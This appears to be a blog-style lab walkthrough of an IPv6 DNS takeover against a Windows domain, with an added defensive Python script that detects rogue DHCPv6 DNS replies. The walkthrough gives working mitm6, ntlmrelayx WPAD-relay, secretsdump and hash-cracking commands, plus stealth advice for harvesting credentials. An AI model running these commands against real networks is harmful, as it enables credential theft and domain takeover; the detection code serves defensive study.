IPv6 is enabled by default on Windows networks starting from Windows Vista and Server 2008. This default configuration presents an opportunity to exploit DNS resolution, allowing an attacker to spoof DNS replies, intercept credentials, and authenticate to services within the network.
Exploiting Default IPv6 Behavior
When a Windows machine checks for its DNS settings, it expects to communicate with a legitimate DNS server. By spoofing the DNS server, an attacker can intercept these requests and manipulate responses. Windows machines typically check DNS settings every 30 minutes or at startup and restart.
If a user enters their credentials during this period, an event is triggered, sending NTLM hashes to the attacker's machine. These hashes can then be relayed to authenticate against other network resources, such as the Domain Controller (DC) or other machines. If the compromised credentials belong to a domain administrator, the attacker gains significant control over the network.
Tools for the Attack
To execute this attack, I'll use:
- mitm6 to spoof the DNS and assign the attacker machine as the IPv6 DNS server.
- ntlmrelayx to relay captured NTLM hashes to LDAP on the DC.
Step 1: Launching mitm6
sudo mitm6 -d steins.local
Once started, mitm6 listens for Windows clients requesting IPv6 configuration via DHCPv6. Since all Windows machines since Vista request this configuration regularly, mitm6 assigns an IPv6 address to the victim and sets the attacker's machine as the default IPv6 DNS server.
With this setup, the victim’s machine logs the attacker as its IPv6 DNS server and starts requesting a WPAD (Web Proxy Auto-Discovery Protocol) configuration.
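The configuration described above arrives at the client as a DHCPv6 Advertise or Reply carrying the DNS Recursive Name Server option (code 23) and the Domain Search List option (code 24). The following is an added example, not code from the original post or from the mitm6 project: a minimal DHCPv6 option parser that decodes those two options and flags a reply whose DNS server or search domain is not on an allowlist, which is the check a network monitor would run to spot a rogue DHCPv6 server. The packets, the allowlisted server 2001:db8::53 and the rogue link-local address fe80::1 are all constructed here; only the domain steins.local comes from the post.

```python
"""Decode a DHCPv6 Advertise/Reply and flag unexpected DNS settings.

Added example (not from the original post): parses the DHCPv6 option
stream (RFC 8415) and the DNS options from RFC 3646, then compares what
the server hands out against an allowlist. All packets and addresses
below are constructed for this example, not captured from a network.
"""
from __future__ import annotations

import ipaddress
import struct

MSG_ADVERTISE = 2
MSG_REPLY = 7
OPT_DNS_SERVERS = 23   # list of 16-byte IPv6 addresses
OPT_DOMAIN_LIST = 24   # DNS search list, uncompressed wire-format names


def parse_options(data: bytes) -> list[tuple[int, bytes]]:
    """Walk the option TLV stream; reject truncated or overlong options."""
    options, pos = [], 0
    while pos < len(data):
        if pos + 4 > len(data):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", data, pos)
        pos += 4
        if pos + length > len(data):
            raise ValueError("option length exceeds packet")
        options.append((code, data[pos:pos + length]))
        pos += length
    return options


def decode_domain_list(value: bytes) -> list[str]:
    """Decode concatenated DNS wire-format names (no label compression)."""
    names, pos = [], 0
    while pos < len(value):
        labels = []
        while True:
            if pos >= len(value):
                raise ValueError("truncated domain name")
            n = value[pos]
            pos += 1
            if n == 0:
                break
            if n > 63 or pos + n > len(value):
                raise ValueError("bad label length")
            labels.append(value[pos:pos + n].decode("ascii"))
            pos += n
        names.append(".".join(labels))
    return names


def parse_message(pkt: bytes) -> dict:
    """Return message type, transaction id, DNS servers and search domains."""
    if len(pkt) < 4:
        raise ValueError("packet too short for a DHCPv6 header")
    msg = {"type": pkt[0], "xid": int.from_bytes(pkt[1:4], "big"),
           "dns_servers": [], "domains": []}
    for code, value in parse_options(pkt[4:]):
        if code == OPT_DNS_SERVERS:
            if len(value) % 16:
                raise ValueError("DNS server option not a multiple of 16 bytes")
            msg["dns_servers"] += [ipaddress.IPv6Address(value[i:i + 16])
                                   for i in range(0, len(value), 16)]
        elif code == OPT_DOMAIN_LIST:
            msg["domains"] += decode_domain_list(value)
    return msg


def rogue_dns_findings(pkt: bytes, allowed_dns, allowed_domains) -> list[str]:
    """List every DNS server or search domain the reply offers that is not allowlisted."""
    msg = parse_message(pkt)
    if msg["type"] not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    allowed_addrs = {ipaddress.IPv6Address(a) for a in allowed_dns}
    allowed_names = {d.lower() for d in allowed_domains}
    findings = [f"unexpected DNS server {s}" for s in msg["dns_servers"] if s not in allowed_addrs]
    findings += [f"unexpected search domain {d}" for d in msg["domains"] if d.lower() not in allowed_names]
    return findings


# --- constructed sample packets (builder is only here to make the example self-contained) ---
def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_reply(xid: int, dns_servers, domains) -> bytes:
    addrs = b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers)
    names = b"".join(encode_name(d) for d in domains)
    return (bytes([MSG_REPLY]) + xid.to_bytes(3, "big")
            + struct.pack("!HH", OPT_DNS_SERVERS, len(addrs)) + addrs
            + struct.pack("!HH", OPT_DOMAIN_LIST, len(names)) + names)


# A rogue server on the local link advertising itself (fe80::1 is a constructed address).
SAMPLE_ROGUE_REPLY = build_reply(0x1A2B3C, ["fe80::1"], ["steins.local"])
# The legitimate reply from the allowlisted resolver (2001:db8::53 is a constructed address).
SAMPLE_BENIGN_REPLY = build_reply(0x1A2B3D, ["2001:db8::53"], ["steins.local"])

if __name__ == "__main__":
    for label, pkt in (("rogue", SAMPLE_ROGUE_REPLY), ("benign", SAMPLE_BENIGN_REPLY)):
        print(label, rogue_dns_findings(pkt, ["2001:db8::53"], ["steins.local"]))
```

A link-local DNS server in a DHCPv6 reply on a network that does not deploy IPv6 is exactly the signature this attack leaves; feeding captured DHCPv6 payloads into rogue_dns_findings with the organisation's real resolvers as the allowlist turns that into an alert.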
Step 2: Exploiting WPAD
WPAD is a protocol that helps clients discover proxy configurations via DHCP and DNS. Because the victim machine trusts the attacker’s DNS server, it attempts to retrieve a WPAD configuration from it.
Using ntlmrelayx, I will serve a malicious WPAD configuration to capture authentication attempts.
sudo ntlmrelayx.py -6 -t ldaps://192.168.109.128 -wh wpad.steins.local -l ~/Desktop/Session/Domain_info | tee relay
- -6 enables IPv6 support.
- -t specifies the target (in this case, LDAPS on the DC).
- -wh defines the WPAD host.
- -l sets the directory for storing captured data.
Step 3: Capturing NTLM Hashes
At this point, I simply wait for users to log in. The Windows authentication process automatically attempts to use WPAD, sending NTLM hashes to the attacker's machine.
Rather than forcing an authentication prompt (which is noisy and suspicious), I let users restart or turn on their computers naturally. As soon as they log in, their credentials are captured. In a real-world scenario, an attacker could wait and accumulate multiple credentials over time.
Step 4: Privilege Escalation
When an admin logs in, ntlmrelayx automatically creates a new account with domain controller access. From here, I can:
- Dump credentials from the DC using secretsdump.py.
- Perform lateral movement within the network.
- Deploy further attacks against critical systems.
secretsdump.py username@192.168.109.128
This retrieves NTLM hashes for all users in the domain.
Step 5: Next Steps - Cracking or Passing the Hash
With these hashes, I have two main options:
1) Crack the Hash
sudo john --format=NT --wordlist=~/Downloads/Tools/rockyou.txt hash
2) Pass the Hash
Instead of cracking, I can use the hashes directly to authenticate to systems within the network, maintaining persistence and escalating privileges further.
Final Thoughts
This attack demonstrates how default IPv6 settings in Windows networks can be leveraged for DNS takeover and credential theft. By combining mitm6 and ntlmrelayx, an attacker can stealthily gain access to critical resources within a domain environment. Understanding and mitigating these risks is crucial for securing enterprise networks against such threats.